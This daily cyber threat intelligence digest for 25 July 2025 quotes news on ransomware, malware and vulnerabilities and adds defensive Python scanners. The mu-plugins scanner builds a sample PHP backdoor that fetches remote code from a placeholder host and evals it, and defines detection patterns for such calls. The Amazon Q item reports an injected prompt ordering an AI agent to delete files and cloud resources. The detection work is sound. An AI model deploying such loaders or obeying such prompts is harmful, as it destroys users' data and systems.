Cyber Threat Intelligence 25 July 2025
Financial Sector
- The Bullseye On Banks: Why Financial Services Remain a Prime Target For Cyberattacks
"The frontlines of cybersecurity have long included the financial services sector, but today’s battlefield is increasingly asymmetric. Threat actors aren’t just going after the big-name banks with sprawling infrastructure and billion-dollar balance sheets. They’re targeting credit unions, wealth management firms, fintech startups, and insurance providers with the same determination and ferocity. What do these entities have that cybercriminals want? Plenty. They are united by their high-value data and direct pathways to financial gain. It’s no surprise then, that a recent report revealed that a staggering 39% of financial firms have experienced a breach."
https://www.tripwire.com/state-of-security/bullseye-banks-why-financial-services-remain-prime-target-cyberattacks
- ATM Fraudsters Halted In Europol-Supported Operation Led By Romanian And British Authorities
"A highly organised criminal group involved in large-scale fraud in Western Europe has been dismantled in a coordinated operation led by authorities from Romania and the United Kingdom (UK), supported by Europol and Eurojust. The gang had travelled from Romania to several Western European countries, mainly the UK, and withdrew large sums of money from ATM machines. They later laundered the proceeds by investing in real estate, companies, vacations and luxury products, including cars and jewellery."
https://www.europol.europa.eu/media-press/newsroom/news/atm-fraudsters-halted-in-europol-supported-operation-led-romanian-and-british-authorities
https://www.infosecurity-magazine.com/news/uk-romania-crack-down-atm-fraudster/
Healthcare Sector
- Medtronic MyCareLink Patient Monitor
"Successful exploitation of these vulnerabilities could lead to system compromise, unauthorized access to sensitive data, and manipulation of the monitor's functionality."
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01
Industrial Sector
- Network Thermostat X-Series WiFi Thermostats
"Successful exploitation of this vulnerability could allow an attacker to gain full administrative access to the device."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-02
- Honeywell Experion PKS
"Successful exploitation of these vulnerabilities could result in information exposure, denial of service, or remote code execution."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-03
- Mitsubishi Electric CNC Series
"Successful exploitation of this vulnerability could allow an attacker to execute malicious code by getting setup-launcher to load a malicious DLL."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-01
- LG Innotek Camera Model LNV5110R
"Successful exploitation of this vulnerability could allow an attacker to gain administrative access to the device."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-04
- Critical Infrastructure Leaders: Threat Level Remains High
"OT environments have long been bereft of their traditional shelter from cyberattacks made from hacker ignorance or disinterest. Industrial environments are forefronts for nation-state hacking, the risk heightened by global tensions and the convergence of operational technology with IT counterparts. For those who can hear, alarms have been sounding loudly for some time. Yet advocacy for the basics - public-private partnerships and information sharing, tightly focused objectives that extend to the smallest operators and resilience planning - is still essential, said a clutch of government and industry leaders assembled Wednesday in New York for a panel hosted at the Global Cyber Innovation Summit."
https://www.bankinfosecurity.com/blogs/critical-infrastructure-leaders-threat-level-remains-high-p-3918
New Tooling
- Autoswagger: Open-Source Tool To Expose Hidden API Authorization Flaws
"Autoswagger is a free, open-source tool that scans OpenAPI-documented APIs for broken authorization vulnerabilities. These flaws are still common, even at large enterprises with mature security teams, and are especially dangerous because they can be exploited with little technical skill. Autoswagger begins by detecting API schemas across a range of common formats and locations, starting with a list of an organization’s domains. It scans for OpenAPI and Swagger documentation pages, sending requests to each host to locate valid schemas. Once identified, it parses the API specifications and automatically generates a list of endpoints to test, taking into account each endpoint’s definition, required parameters, and expected data types."
https://www.helpnetsecurity.com/2025/07/24/autoswagger-open-source-tool-expose-hidden-api-authorization-flaws/
https://github.com/intruder-io/autoswagger/
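The script below is an added example of the enumerate-then-probe approach the summary describes; it is not Autoswagger's own code. It covers only an OpenAPI 3 document already in hand (the real tool also discovers specs across hosts and handles Swagger 2.0). The SPEC, the api.example.invalid host and the fake_send transport are all constructed so it runs offline; swapping fake_send for a real HTTP client is the only change needed to run it against an API you are authorized to test.

```python
"""Enumerate an OpenAPI 3 document and probe every operation without
credentials, reporting operations the spec says need auth but that still
answer 2xx with a body.

Added example, not Autoswagger's code. SPEC, the hostname and the
FAKE_RESPONSES transport are constructed so the script runs offline.
"""

from dataclasses import dataclass
from typing import Any, Callable

Send = Callable[[str, str, dict], tuple[int, str]]  # (method, url, query) -> (status, body)


@dataclass
class Probe:
    method: str
    url: str
    query: dict
    requires_auth: bool  # derived from the spec's security requirements


def sample_value(schema: dict) -> Any:
    """Pick a plausible value from a parameter schema so the request is
    well-formed enough to reach the server's authorization check."""
    if "enum" in schema:
        return schema["enum"][0]
    return {"integer": 1, "number": 1.0, "boolean": True}.get(schema.get("type"), "test")


def build_probes(spec: dict) -> list[Probe]:
    """One probe per (path, method), with path and required query params filled."""
    base = spec["servers"][0]["url"].rstrip("/")
    global_security = spec.get("security", [])
    probes = []
    for path, item in spec["paths"].items():
        path_level = item.get("parameters", [])
        for method, op in item.items():
            if method == "parameters":
                continue
            url, query = path, {}
            for p in path_level + op.get("parameters", []):
                value = sample_value(p.get("schema", {}))
                if p["in"] == "path":
                    url = url.replace("{%s}" % p["name"], str(value))
                elif p["in"] == "query" and p.get("required"):
                    query[p["name"]] = value
            # An operation-level "security": [] explicitly makes it public;
            # an absent key inherits the document-level requirement.
            requires_auth = bool(op.get("security", global_security))
            probes.append(Probe(method.upper(), base + url, query, requires_auth))
    return probes


def find_broken_auth(spec: dict, send: Send) -> list[str]:
    """Operations that require auth per the spec yet answer 2xx with content
    to an unauthenticated request."""
    findings = []
    for pr in build_probes(spec):
        status, body = send(pr.method, pr.url, pr.query)
        if pr.requires_auth and 200 <= status < 300 and body.strip():
            findings.append(f"{pr.method} {pr.url}")
    return findings


# Constructed OpenAPI 3 document (hypothetical API, not a real service).
SPEC = {
    "openapi": "3.0.3",
    "servers": [{"url": "https://api.example.invalid/v1"}],
    "security": [{"bearerAuth": []}],  # document-wide: auth required
    "paths": {
        "/health": {"get": {"security": [], "responses": {"200": {}}}},  # explicitly public
        "/users/{id}": {
            "get": {
                "parameters": [{"name": "id", "in": "path", "required": True,
                                "schema": {"type": "integer"}}],
                "responses": {"200": {}},
            }
        },
        "/orders": {
            "get": {
                "parameters": [
                    {"name": "status", "in": "query", "required": True,
                     "schema": {"type": "string", "enum": ["open", "closed"]}},
                    {"name": "limit", "in": "query", "schema": {"type": "integer"}},
                ],
                "responses": {"200": {}},
            },
            "post": {"responses": {"201": {}}},
        },
    },
}

# Constructed transport standing in for an HTTP client; /users/{id} is the
# planted broken-authorization case.
FAKE_RESPONSES = {
    ("GET", "https://api.example.invalid/v1/health"): (200, '{"status":"ok"}'),
    ("GET", "https://api.example.invalid/v1/users/1"): (200, '{"id":1,"email":"alice@example.invalid"}'),
    ("GET", "https://api.example.invalid/v1/orders"): (401, ""),
    ("POST", "https://api.example.invalid/v1/orders"): (401, ""),
}


def fake_send(method: str, url: str, query: dict) -> tuple[int, str]:
    return FAKE_RESPONSES.get((method, url), (404, ""))


if __name__ == "__main__":
    for finding in find_broken_auth(SPEC, fake_send):
        print("possible broken authorization:", finding)
```

A 2xx with a body is only a lead: catch-all pages that return 200 for every path give the same signal, so compare the unauthenticated body with the response for a path that does not exist before reporting, and call it a BOLA/BFLA finding only after confirming the returned data belongs to another principal.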
Vulnerabilities
- Mitel Warns Of Critical MiVoice MX-ONE Authentication Bypass Flaw
"Mitel Networks has released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform. MX-ONE is the company's SIP-based communications system, which can scale to support hundreds of thousands of users. The critical security flaw is due to an improper access control weakness discovered in the MiVoice MX-ONE Provisioning Manager component and has yet to be assigned a CVE ID. Unauthenticated attackers can exploit it in low-complexity attacks that don't require user interaction to gain unauthorized access to administrator accounts on unpatched systems."
https://www.bleepingcomputer.com/news/security/mitel-warns-of-critical-mivoice-mx-one-authentication-bypass-flaw/
https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009
https://thehackernews.com/2025/07/critical-mitel-flaw-lets-hackers-bypass.html
- SonicWall Urges Admins To Patch Critical RCE Flaw In SMA 100 Devices
"SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution. The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system. "SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the specified fixed release version to remediate this vulnerability," the company said. "This vulnerability does not affect SonicWall SSL VPN SMA1000 series products or SSL-VPN running on SonicWall firewalls.""
https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-critical-rce-flaw-in-sma-100-VPN-appliances/
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0014
https://thehackernews.com/2025/07/sophos-and-sonicwall-patch-critical-rce.html
https://www.securityweek.com/sonicwall-patches-critical-sma-100-vulnerability-warns-of-recent-malware-attack/
https://securityaffairs.com/180328/security/sonicwall-fixed-critical-flaw-in-sma-100-devices-exploited-in-overstep-malware-attacks.html
https://www.helpnetsecurity.com/2025/07/24/sonicwall-fixes-critical-flaw-sma-appliances-urges-customers-to-check-for-compromise-cve-2025-40599/
- Bloomberg Comdb2 Null Pointer Dereference And Denial-Of-Service Vulnerabilities
"Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Bloomberg Comdb2. Comdb2 is an open source, high-availability database developed by Bloomberg. It supports features such as clustering, transactions, snapshots, and isolation. The implementation of the database utilizes optimistic locking for concurrent operation. The vulnerabilities mentioned in this blog post have been patched by the vendor, all in adherence to Cisco’s third-party vulnerability disclosure policy."
https://blog.talosintelligence.com/bloomberg-comdb2-null-pointer-dereference-and-denial-of-service-vulnerabilities/
- Beyond Convenience: Exposing The Risks Of VMware vSphere Active Directory Integration
"Broadcom's VMware vSphere product remains a popular choice for private cloud virtualization, underpinning critical infrastructure. Far from fading, organizations continue to rely heavily on vSphere for stability and control. We're also seeing a distinct trend where critical workloads are being repatriated from public cloud services to these on-premises vSphere environments, influenced by strategies like bimodal IT and demands for more operational oversight."
https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks
https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944/
Malware
- Storm-2603 Exploits SharePoint Flaws To Deploy Warlock Ransomware On Unpatched Systems
"Microsoft has revealed that one of the threat actors behind the active exploitation of SharePoint flaws is deploying Warlock ransomware on targeted systems. The tech giant, in an update shared Wednesday, said the findings are based on an "expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603." The threat actor attributed to the financially motivated activity is a suspected China-based threat actor that's known to drop Warlock and LockBit ransomware in the past. The attack chains entail the exploitation of CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability, targeting unpatched on-premises SharePoint servers to deploy the spinstall0.aspx web shell payload."
https://thehackernews.com/2025/07/storm-2603-exploits-sharepoint-flaws-to.html
https://www.bleepingcomputer.com/news/security/microsoft-sharepoint-servers-also-targeted-in-ransomware-attacks/
https://therecord.media/microsoft-says-warlock-ransomware-deployed-in-sharepoint-attacks
https://www.darkreading.com/endpoint-security/ransomware-actors-toolshell-sharepoint-bugs
https://cyberscoop.com/microsoft-sharepoint-attacks-400-victims-us-agencies/
https://www.infosecurity-magazine.com/news/ransomware-compromised-sharepoint/
https://www.securityweek.com/toolshell-attacks-hit-400-sharepoint-servers-us-government-victims-named/
https://www.helpnetsecurity.com/2025/07/24/storm-2603-spotted-deploying-ransomware-on-exploited-sharepoint-servers/
https://www.theregister.com/2025/07/24/microsoft_sharepoint_ransomware/
- Gunra Ransomware Emerges With New DLS
"AhnLab TIP monitors the current ransomware group activities across dark web forums, marketplaces, and other sources. Through the Live View > Dark Web Watch menu, users can track the most active ransomware groups, uncover their collaborations, and gain insights into planned attacks and techniques—enabling user organizations to anticipate threats, prepare defenses, and prevent damage before it occurs."
https://asec.ahnlab.com/en/89206/
- Uncovering a Stealthy WordPress Backdoor In Mu-Plugins
"Recently, our team uncovered a particularly sneaky piece of malware tucked away in a place many WordPress users don’t even know exists: the mu-plugins folder. In fact, back in March, we saw a similar trend with hidden malware in this very directory, as detailed in our post Hidden Malware Strikes Again: MU-Plugins Under Attack. This current infection was designed to be quiet, persistent, and very hard to spot."
https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html
https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html
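As an added example (not Sucuri's tooling), the scanner below walks a mu-plugins directory and scores every PHP file against a small set of heuristic indicators. The indicator list is an assumption for illustration, not a signature set, and the sample tree it builds is constructed. The point it makes about the directory is the one the write-up relies on: every top-level .php file in wp-content/mu-plugins runs on every request with no activation step, so a file dropped there executes silently; files in subdirectories only run if a top-level loader includes them, which is why the scanner records whether a file is auto-loaded.

```python
"""Triage scanner for WordPress wp-content/mu-plugins.

Added example, not Sucuri's code. The INDICATORS patterns are assumed
heuristics (tune them for your site); the sample tree is constructed.
"""

import os
import re
import tempfile

# Heuristic indicators of obfuscated or remotely fed code (assumed, not a signature set).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "decode": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]?https?://"),
    "dynamic_call": re.compile(r"\b(create_function|call_user_func(_array)?|assert)\s*\("),
    "request_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
    "long_b64": re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
}


def scan_file(path: str) -> list[str]:
    """Names of the indicators that match anywhere in the file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_mu_plugins(root: str) -> list[dict]:
    """Score every .php file under root; highest score first.

    'autoloaded' is True only for top-level files, which WordPress loads on
    every request without any activation; deeper files need a loader."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            results.append({
                "path": os.path.relpath(full, root),
                "indicators": hits,
                "score": len(hits),
                "autoloaded": os.path.abspath(dirpath) == os.path.abspath(root),
            })
    return sorted(results, key=lambda r: -r["score"])


def build_sample_tree() -> str:
    """Constructed mu-plugins directory: one benign file, one that fetches
    remote code and evals it (inert here; the host is .invalid)."""
    root = tempfile.mkdtemp(prefix="mu-plugins-")
    benign = """<?php
/* Plugin Name: Disable XML-RPC */
add_filter('xmlrpc_enabled', '__return_false');
"""
    suspicious = """<?php
/* Plugin Name: Cache Helper */
add_action('init', function () {
    $src = @file_get_contents('https://cdn.example.invalid/helper.txt');
    if ($src !== false) { eval(base64_decode($src)); }
});
"""
    for name, body in (("disable-xmlrpc.php", benign), ("cache-helper.php", suspicious)):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for r in scan_mu_plugins(build_sample_tree()):
        flag = "SUSPICIOUS" if r["score"] >= 2 else "ok"
        print(f"{flag:10} score={r['score']} autoloaded={r['autoloaded']} {r['path']} {r['indicators']}")
```

Treat a score of 2 or more as a file to read by hand rather than a verdict: legitimate caching and security plugins also call base64_decode and fetch over HTTPS, and the hits that matter most are the combination of remote fetch feeding eval, which is what the sample reproduces.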
https://securityaffairs.com/180311/malware/stealth-backdoor-found-in-wordpress-mu-plugins-folder.html
- AI-Generated Malware In Panda Image Hides Persistent Linux Threat
"The line between human and machine-generated threats is starting to blur. Aqua Nautilus recently uncovered a malware campaign that hints at this unsettling shift. Koske, a sophisticated Linux threat, shows clear signs of AI-assisted development, likely with help from a large language model. With modular payloads, evasive rootkits, and delivery through weaponized image files, Koske represents a new breed of persistent and adaptable malware built for one purpose: cryptomining. It is a warning of what is to come."
https://www.aquasec.com/blog/ai-generated-malware-in-panda-image-hides-persistent-linux-threat/
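The checker below is an added example prompted by the Koske write-up; it is not Aqua's code. It assumes the payload is appended after the JPEG's End-Of-Image marker, one common polyglot layout (Koske's exact packaging is described in the linked report, not here), and the sample image it builds is a constructed minimal JPEG rather than a real photo. Walking the marker structure matters because a naive search for the last FF D9 lands inside any appended binary that happens to contain those bytes.

```python
"""Detect data appended after a JPEG's End-Of-Image marker, one way a
script or binary can ride inside an image file.

Added example, not Aqua's analysis code. Assumes an appended-after-EOI
layout; the sample JPEG is constructed.
"""


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker, found by walking the marker
    structure (entropy-coded data only contains FF00 stuffing and RSTn)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                            # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                            # EOI
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # standalone: TEM, RSTn, SOI
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:                            # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_payload(data: bytes) -> bytes:
    """Everything after the image proper; empty for a clean file."""
    return data[jpeg_end_offset(data):]


def classify_payload(tail: bytes) -> str:
    """Rough label for what was appended."""
    if not tail:
        return "none"
    head = tail.lstrip()
    if head.startswith(b"#!"):
        return "script (shebang)"
    if head.startswith(b"<?php"):
        return "php"
    if tail.startswith(b"\x7fELF"):
        return "elf"
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in tail)
    return "text" if printable / len(tail) > 0.9 else "binary"


def build_sample_jpeg(payload: bytes = b"") -> bytes:
    """Constructed minimal JPEG: SOI, APP0/JFIF, SOS with a few bytes of scan
    data (including FF00 stuffing and an RST0 marker), EOI, then payload."""
    soi = b"\xff\xd8"
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    eoi = b"\xff\xd9"
    return soi + app0 + sos + scan + eoi + payload


if __name__ == "__main__":
    # Constructed stand-in payload; the FF D9 inside it defeats a naive rfind.
    fake_script = b"#!/bin/bash\n# \xff\xd9 <- looks like EOI but sits inside the payload\necho hi\n"
    sample = build_sample_jpeg(fake_script)
    tail = trailing_payload(sample)
    print("trailing bytes:", len(tail), "class:", classify_payload(tail))
    print("naive rfind offset:", sample.rfind(b"\xff\xd9"), "parsed EOI offset:", jpeg_end_offset(sample))
```

A non-empty tail is a triage lead rather than proof: some cameras and editors append metadata after EOI, so look at the classification and the bytes before escalating. PNG needs the equivalent check after its IEND chunk, which this example does not cover.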
https://www.bleepingcomputer.com/news/security/new-koske-linux-malware-hides-in-cute-panda-images/
- Unmasking The New Chaos RaaS Group Attacks
"Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks. Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion."
https://blog.talosintelligence.com/new-chaos-ransomware/
- Hacker Sneaks Infostealer Malware Into Early Access Steam Game
"A threat actor called EncryptHub has compromised a game on Steam to distribute info-stealing malware to unsuspecting users downloading the title. A few days ago, the hacker (also tracked as Larva-208), injected malicious binaries into the Chemia game files hosted on Steam. Chemia is a survival crafting game from developer ‘Aether Forge Studios,’ which is currently offered as early access on Steam but has no public release date. According to threat intelligence company Prodaft, the initial compromise occurred on July 22, when EncryptHub added to the game files the HijackLoader malware (CVKRUTNP.exe), which establishes persistence on the victim device and downloads the Vidar infostealer (v9d9d.exe)."
https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-malware-into-early-access-steam-game/
- Toptal’s GitHub Organization Hijacked: 10 Malicious Packages Published
"Socket's Threat Research Team discovered this exact scenario when 73 repositories in Toptal's GitHub organization went public, with at least 10 of them containing malicious code designed to exfiltrate GitHub authentication tokens and destroy victim systems. Toptal, a global talent network that has served over 25,000 clients across 14+ countries since 2010, maintains the Picasso design system used by developers worldwide."
https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published
https://www.bleepingcomputer.com/news/security/hackers-breach-toptal-github-account-publish-malicious-npm-packages/
- Gamers, Get Ready: Scammers Disguise Cryptocurrency And Password-Stealing Scavenger Trojans As Cheats And Mods
"Doctor Web’s virus laboratory has detected Trojan.Scavenger—a family of malicious apps that threat actors use to steal confidential data from crypto wallets and password managers from Windows users. Threat actors chain together several trojans from this family, exploiting DLL Search Order Hijacking vulnerabilities to execute their payloads and exfiltrate data."
https://news.drweb.com/show/?i=15036&lng=en
https://hackread.com/scavenger-trojan-crypto-wallets-game-mods-browser-flaws/
- The Dark Side Of Romance: SarangTrap Extortion Campaign
"In recent weeks, our zLabs team uncovered a highly coordinated and emotionally manipulative malware campaign targeting mobile users on both Android and iOS platforms. This extensive campaign involved over 250 malicious Android applications and more than 80 malicious domains, all disguised as legitimate dating and social media applications. Threat actors used these domains to deceive users into installing malware designed to extract sensitive personal data, such as contact lists and private images, all while maintaining a convincing appearance of normalcy. These malicious apps specifically targeted a diverse audience, including dating app users, cloud file service seekers, and car service platforms (see Figure 1)."
https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign
https://www.infosecurity-magazine.com/news/malware-campaign-dating-apps/
- Soco404: Multiplatform Cryptomining Campaign Uses Fake Error Pages To Hide Payload
"Wiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed Soco404 (based on the observed payload name, associated domain, and use of fake error pages). While previous activity tied to this campaign has been documented by Aqua and Imperva as targeting exposed Apache Tomcat services with weak credentials, as well as vulnerable Apache Struts and Atlassian Confluence servers, our investigation uncovered a distinct case in which the attacker also targets exposed PostgreSQL instances and leverages compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. We also found evidence that the attacker is maintaining a broader crypto-scam infrastructure, further suggesting this is part of a long-term, versatile, and opportunistic operation."
https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload
https://www.infosecurity-magazine.com/news/campaign-exploits-cloud/
- Fire Ant: A Deep-Dive Into Hypervisor-Level Espionage
"Since early 2025, Sygnia tracked and responded to incidents attributed to a threat actor we designate Fire Ant. The group demonstrates consistent targeting of virtualization and network infrastructure, using these systems as footholds for initial access, lateral movement, and long-term persistence. Fire Ant’s operations are characterized by infrastructure-centric TTPs, enabling activity beneath the detection threshold of traditional endpoint controls, highlighting critical blind spots of conventional security stacks."
https://www.sygnia.co/blog/fire-ant-a-deep-dive-into-hypervisor-level-espionage/
https://thehackernews.com/2025/07/fire-ant-exploits-vmware-flaw-to.html
https://therecord.media/stealthy-china-spies-fire-ant-virtualization-software
- CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos And ClickFix Phishing
"Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News. The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT, and even other loaders like Hijack Loader."
https://thehackernews.com/2025/07/castleloader-malware-infects-469.html
- FBI: Thousands Of People Involved In 'The Com' Targeting Victims With Ransomware, Swatting
"The FBI released a warning on Wednesday about a loosely-organized cybercriminal organization known as The Com that is launching cyberattacks to steal money and gain access to sensitive information. The agency released three bulletins about the group — which is composed primarily of English-speaking minors but has expanded to include thousands of people who engage in a variety of cybercriminal activity. The activities include ransomware attacks, swatting, extortion of minors, the distribution of child sexual abuse material, distributed denial-of-service (DDoS) attacks, SIM Swapping, cryptocurrency theft and more. “The motivations behind the criminal activity vary, but often fall within one of the following: financial gain, retaliation, ideology, sexual gratification, and notoriety,” the FBI said."
https://therecord.media/fbi-the-com-ransomware-swatting-alert
https://www.ic3.gov/PSA/2025/PSA250723-3
https://www.infosecurity-magazine.com/news/fbi-exposes-the-coms/
- Compromised Amazon Q Extension Told AI To Delete Everything – And It Shipped
"The official Amazon Q extension for Visual Studio Code (VS Code) was compromised to include a prompt to wipe the user's home directory and delete all their AWS resources. The bad extension was live on the VS Code marketplace for two days, though it appears that the intent was more to embarrass AWS and expose bad security rather than to cause immediate harm. A commit to the Amazon Q part of the AWS toolkit for VS Code includes a script that downloads an additional file, saved as extensionNode.ts. The source for this file includes a prompt instructing an AI agent to delete all non-hidden files from the user's home directory and then to "discover and use AWS profiles to list and delete cloud resources using AWS CLI commands.""
https://www.theregister.com/2025/07/24/amazon_q_ai_prompt/
https://aws.amazon.com/security/security-bulletins/rss/aws-2025-015/
- ToolShell: An All-You-Can-Eat Buffet For Threat Actors
"On July 19, 2025, Microsoft confirmed that a set of zero-day vulnerabilities in SharePoint Server called ToolShell is being exploited in the wild. ToolShell is comprised of CVE-2025-53770, a remote code execution vulnerability, and CVE‑2025‑53771, a server spoofing vulnerability. These attacks target on-premises Microsoft SharePoint servers, specifically those running SharePoint Subscription Edition, SharePoint 2019, or SharePoint 2016. SharePoint Online in Microsoft 365 is not impacted. Exploiting these vulnerabilities enables threat actors to gain entry to restricted systems and steal sensitive information."
https://www.welivesecurity.com/en/eset-research/toolshell-an-all-you-can-eat-buffet-for-threat-actors/
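The Storm-2603 item earlier in this section names spinstall0.aspx as the web shell dropped on exploited SharePoint servers, and the ToolShell item above describes the same exploitation wave. The script below is an added example (not Microsoft's or ESET's detection content) that hunts IIS W3C logs for requests to that file and summarizes them per client address. The log lines are constructed; the column set follows the default IIS layout, but servers log different columns, which is why the #Fields header is parsed rather than assumed.

```python
"""Hunt IIS W3C logs for requests to the spinstall0.aspx web shell named in
the SharePoint exploitation reports.

Added example, not vendor detection content. SAMPLE_LOG is constructed;
IIS writes spaces inside fields (e.g. User-Agent) as '+', so whitespace
splitting is safe.
"""

WEB_SHELL_NAMES = {"spinstall0.aspx"}  # IOC from the reports; attackers can rename

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-07-23 10:15:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) 200
2025-07-23 10:16:40 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 203.0.113.9 python-requests/2.32.0 401
2025-07-23 10:16:44 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 python-requests/2.32.0 200
2025-07-23 10:16:50 10.0.0.5 GET /_layouts/16/SPINSTALL0.aspx - 443 - 203.0.113.9 python-requests/2.32.0 200
2025-07-23 10:17:03 10.0.0.5 GET /sites/hr/Shared%20Documents/Forms/AllItems.aspx - 443 CORP\\bob 10.0.0.80 Mozilla/5.0+(Windows+NT+10.0) 200
"""


def parse_w3c(lines):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # no header yet, or a malformed line
        yield dict(zip(fields, values))


def find_webshell_hits(lines, names=WEB_SHELL_NAMES):
    """Records whose requested file name (case-insensitive) is a known shell,
    whatever the status code: a 404 from an external address is still a probe."""
    hits = []
    for rec in parse_w3c(lines):
        filename = rec.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower()
        if filename in names:
            hits.append(rec)
    return hits


def summarize_by_ip(hits):
    """Per client IP: hit count, first/last timestamp, paths and status codes seen."""
    summary = {}
    for h in hits:
        ts = f"{h['date']} {h['time']}"
        s = summary.setdefault(h["c-ip"], {"count": 0, "first": ts, "last": ts,
                                           "paths": set(), "statuses": set()})
        s["count"] += 1
        s["first"] = min(s["first"], ts)
        s["last"] = max(s["last"], ts)
        s["paths"].add(h["cs-uri-stem"])
        s["statuses"].add(h["sc-status"])
    return summary


if __name__ == "__main__":
    for ip, s in summarize_by_ip(find_webshell_hits(SAMPLE_LOG.splitlines())).items():
        print(f"{ip}: {s['count']} hits {s['first']} .. {s['last']} "
              f"paths={sorted(s['paths'])} statuses={sorted(s['statuses'])}")
```

Because the file name is an indicator from the reports and can be changed by the attacker, pair this with a file-system check for recently created .aspx files under the SharePoint LAYOUTS directories, and treat any hit from an address that also received 401s moments earlier, as in the sample, as an exploitation attempt rather than stray scanning.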
General News
- Why Outsourcing Cybersecurity Is Rising In The Adriatic Region
"In this Help Net Security interview, Aleksandar Stančin, Board Member Adriatics, Exclusive Networks, discusses the state of cybersecurity in the Adriatic region. He talks about how local markets often lag behind EU regulations, despite facing threats comparable to those in other parts of Europe. While adoption may be slower, progress is underway to strengthen cybersecurity across industries."
https://www.helpnetsecurity.com/2025/07/24/aleksandar-stancin-exclusive-networks-adriatic-region-cybersecurity/
- Your App Is Under Attack Every 3 Minutes
